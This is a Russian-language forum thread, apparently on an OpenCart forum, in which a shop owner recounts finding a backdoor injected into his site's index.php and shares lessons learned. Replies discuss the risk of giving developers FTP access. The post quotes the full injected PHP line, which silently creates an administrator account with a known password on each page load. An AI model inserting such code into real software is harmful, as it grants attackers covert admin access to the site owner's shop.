Перейти к содержанию
imanager

История одной то ли шутки, то ли взлома

Рекомендуемые сообщения

Сегодня утром мне понадобилось создать еще одного пользователя. Зашел в админку и ужаснулся - на странице пользователей создано 400 с лишним записей с логином test, одинаковой почтой и всеми другими данными. В холодном поту я их все поудалял, удалил все FTP аккаунты, сменил пароль на базу данных и пароли для всех пользователей.

Но это не помогло, пользователи (с админским доступом!) продолжали появляться.

 

Я не очень осведомлен во всех этих премудростях, поэтому все что мне пришло в голову - копать статистику сервера. Магазин еще в люди не выпущен (это не столько бизнес, сколько  долгоиграющее хобби типа рыбалки, только ловля в будет в интернете), соответственно заходят пока только те, кто наполняют сайт, и я решил, что по IP можно что-то там проанализировать и понять. Но ковыряния эти ни к чему не привели, и я пошел другим путем.

 

Скачал программку для сравнения файлов WinMerge, скачал файлы сайта, задал маску *.php, и поставил сравнение с двухдневным бекапом сайта.

 

Кака сразу нашлась, какой-то шутник в index.php вставил код, все остальные файлы были неизменны:

$db->query("INSERT INTO `" . DB_PREFIX . "user` SET username = 'test', salt = '" . $db->escape($salt = substr(md5(uniqid(rand(), true)), 0, 9)) . "', password = '" . $db->escape(sha1($salt . sha1($salt . sha1('test123')))) . "', firstname = 'test', lastname = 'log', email = 'xyz@gmail.com', user_group_id = '1', status = '1', date_added = NOW()");

Код был удален, и пока что все ок.

 

Остался открытым вопрос, кто это мог сделать. За это время я давал доступ паре-тройке программистов (буржуазных и местных), когда установленные модули не хотели работать так как им полагалось. Но при этом я дурень, доступы эти потом не снимал. Поэтому кто из них мог оставить такой привет, остается только догадываться. Я вроде ни с кем не ругался, и все свои обязательства выполняю аккуратно.

 

Хуже будет, если это сделал человек, не имеющий изначально доступа. Но как это проверить, я пока не знаю.

 

Из этой всей истории я сделал для себя несколько очень важных выводов:

 

  • нужно делать бекапы как можно чаще, даже если вы не меняли сайт, делать раз в сутки например, это очень полезно
  • посторонним людям давать доступ только разовый, и потом сразу же его закрывать
  • программка для сравнения файлов как нельзя лучше подойдет для вылавливания багов

 

Я понимаю, что многим умудренным вебмастерам эти выводы очевидны, но все-таки решил поделиться, наверняка есть такие же неопытные товарищи, как я.

 

P.S. Если это была чья-то шутка, то я благодарен шутникам за то, что она оказалась довольно безобидна, и за приобретенный бесценный опыт. А если все-таки кто-то взломал сайт, то буду отписываться здесь о дальнейшем развитии событий. Спасибо что дочитали до конца

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Да, это одна из очень существенных проблем опенкарта: 

К огромному сожалению в опенкарте нету нормальной системы API, чтобы можно было с помощью например хуков, как в Друпале  внести изменения в движок не затрагивая другие файлы.  Вместо этого присутствует или костыль под названием vqmod или изменения приходится вносить вручную, изменяя файлы движка, что в других движках вообще считается дикостью, но в опенкарте это норма. Из-за этого возникает 95% всех проблем с модулями. И решить эти проблемы кроме как предоставить разработчику фтп доступ к сайту пользователя, если он далек от программирования, невозможно. 

А разработчики они ведь разные бывают.. кто-то честно внесет изменения и выйдет, а какое-то падло добавит на сайт код вируса или оставит для себя лазейку доступа в админку.. А кто-то может сделать пакость не специально а по незнанию или по ошибке.. 

Трагедия в том, что иначе как предоставить фтп доступ разработчику проблему не решить. Разве что или самому учить программирование или нанять 1 программиста чтобы только он 1 имел доступ и вносил все изменения в сайт.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Работайте с профиссионалами и не будет проблем :-D

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.